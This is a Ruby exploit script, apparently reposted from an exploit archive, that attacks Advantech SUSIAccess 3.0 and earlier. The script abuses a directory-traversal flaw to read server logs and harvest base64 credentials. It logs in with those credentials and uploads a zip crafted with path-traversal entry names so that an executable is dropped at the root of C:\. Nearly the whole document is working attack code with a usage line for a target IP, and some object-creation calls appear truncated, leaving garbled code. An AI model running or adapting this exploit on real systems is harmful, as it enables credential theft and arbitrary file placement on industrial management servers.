Advantech SUSIAccess <= 3.0 - 'RecoveryMgmt' File Upload
来源 作者:Fitts 发布时间:2017-08-02
#! /usr/bin/env ruby =begin Exploit Title: Advantech SUSIAccess RecoveryMgmt File Upload Date: 07/31/17 Exploit Author: james fitts Vendor Homepage: Version: Advantech SUSIAccess <= 3.0 Tested on: Windows 7 SP1 Relavant Advisories: ZDI-16-630 ZDI-16-628 CVE-2016-9349 CVE-2016-9351 BID-94629 ICSA-16-336-04 Notes: This PoC will upload AcronisInstaller.exe to the root of C:\ You can modify this to drop files where ever you want on the filesystem. By default the script will use the directory traversal vuln to pull down the log files and parse for the base64 encoded credentials. Once it has that, it will use them to log into the application and upload the malicious zip file. =end require 'mime/types' require 'fileutils' require 'net/http' require 'nokogiri' require 'base64' require 'digest' require 'date' require 'uri' require 'zip' def uploadZip(target, creds, cookies) uri = URI("http://#{target}:8080/webresources/RecoveryMgmt/upload") bound = "AaBbCcDdEe" path = Dir.pwd zipfile = "#{path}/" post_data = [] post_data << "--#{bound}\r\n" post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_LastUpdateName\"" post_data << "\r\n\r\n\r\n" post_data << "--#{bound}\r\n" post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_UploadFileFullName\"" post_data << "\r\n\r\\r\n" post_data << "--#{bound}\r\n" post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_Content\"" post_data << "\r\n\r\n" post_data << "<request Authorization=\"#{creds[0].to_s}\"/>\r\n" post_data << "--#{bound}\r\n" post_data << "Content-Disposition: form-data; name=\"frmUpdateSetting_Acronis_FileInput\"; filename=\"\"" post_data << "\r\nContent-Type: application/zip" post_data << "\r\n\r\n" post_data << post_data << "\r\n\r\n--#{bound}--\r\n" req =, initheader = { 'Cookie' => cookies, 'Authorization' => "Basic #{creds[0].to_s}", 'X-Requested-With' => "XMLHttpRequest", 'Content-Type' => "multipart/form-data; boundary=#{bound}", 'User-Agent' => "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", 'Accept-Language' => "en-US,en;q=0.5", 'Accept' => "text/plain, */*; q=0.01", 'Connection' => "close" }) req.body = post_data.join http ="#{target}", 8080) res = http.start {|http| http.request(req)} if res.code =~ /200/ puts "[+] Upload successful!" end end def craftZip(target, payload) path = "../../../../../../../../../../Program%20Files\\Advantech\\SUSIAccess%203.0%20Server\\Setting.xml" uri = URI("http://#{target}:8080/downloadCSV.jsp?file=#{path}") res = Net::HTTP.get_response(uri) xml = Nokogiri::XML(res.body) ver = xml.xpath('//setting/Configuration/ThridParty/Acronis/version').to_s.split("=")[1].split("\"")[1] kern_ver = xml.xpath('//setting/Configuration/ThridParty/Acronis/kernal_version').to_s.split("=")[1].split("\"")[1] # version information doesn't matter # the application will still extract the zip # file regardless of whether or not its # a greater version or lesser f ="LatestVersion.txt", 'w') f.puts("Installer Version: #{ver}\r\nApplication Version: #{kern_ver}") f.close f ="md5.txt", 'w') md5 = Digest::MD5.hexdigest("AcronisInstaller.exe")) f.puts md5 f.close path = Dir.pwd zipfile = "#{path}/" if File.exist?(zipfile) FileUtils.rm(zipfile) end files = ["AcronisInstaller.exe", "LatestVersion.txt", "md5.txt"] levels = "../" * 10, Zip::File::CREATE) do |zip| files.each do |fname| if fname == "AcronisInstaller.exe" zip.add("#{levels}#{fname}", fname) end zip.add(fname, fname) end end if File.exist?(zipfile) puts "[!] Malicious zip created successfully" end end def doLogin(target, creds) formattedDate ="%a %b %d %Y %H:%M:%S GMT-0400 (EDT)") formattedDate = URI::encode(formattedDate) uri = URI("http://#{target}:8080/frmServer.jsp?d=#{formattedDate}") res = Net::HTTP.get_response(uri) jsessid = res.header['Set-Cookie'].split(';')[0] cookies = "deviceType=pc; log4jq=OFF; selectedLang=en_US; #{jsessid}" uname = Base64.decode64(creds[0].to_s).split(":")[0] pass = Base64.decode64(creds[0].to_s).split(":")[1] data = "<request Authorization=\"#{creds[0].to_s}\">" data << "<item name=\"username\" value=\"#{uname}\"/>" data << "<item name=\"password\" value=\"#{pass}\"/>" data << "</request>" puts "[+] Attempting login with pilfered credentials now" uri = URI("http://#{target}:8080/webresources/AccountMgmt/Login") req =, initheader = { 'Content-Type' => "application/xml", 'Cookies' => cookies, 'Authorization' => "Basic #{creds[0].to_s}", 'X-Requested-With' => 'XMLHttpRequest' }) req.body = data http ="#{target}", 8080) res = http.start {|http| http.request(req)} if res.body =~ /<result><role name/ puts "[+] Login successful!" return cookies else puts "[-] Something went wrong..." end end def getCreds(target) cnt = 1 d = d.strftime("%y-%m-%d") creds = [] while cnt < 31 fdate = d - cnt cnt += 1 path = "../../../../../../../../../../Program Files\\Apache Software Foundation\\logs\\" file = "localhost_access_log.#{fdate}.txt" full_path = path + file uri = URI("http://#{target}:8080/downloadCSV.jsp?file=#{full_path}") res = Net::HTTP.get_response(uri) if res.code =~ /200/ creds << res.body.scan(/(?<=Authorization=%22)[A-Za-z0-9=]+/) end end return creds.flatten.uniq end ## # Main ## if ARGV.length != 1 puts "Usage:\r\n\truby #{$0} [TARGET IP]" else target = ARGV[0] payload = "AcronisInstaller.exe" puts "[+] Extracting credentials now..." credentials = getCreds(target) if credentials.length > 0 puts "[!] Credentials found!" cookies = doLogin(target, credentials) puts "[+] Crafting malicious zip now..." craftZip(target, payload) uploadZip(target, credentials, cookies) else puts "[-] Credentials not found.. Try searching for more log files.." exit end end
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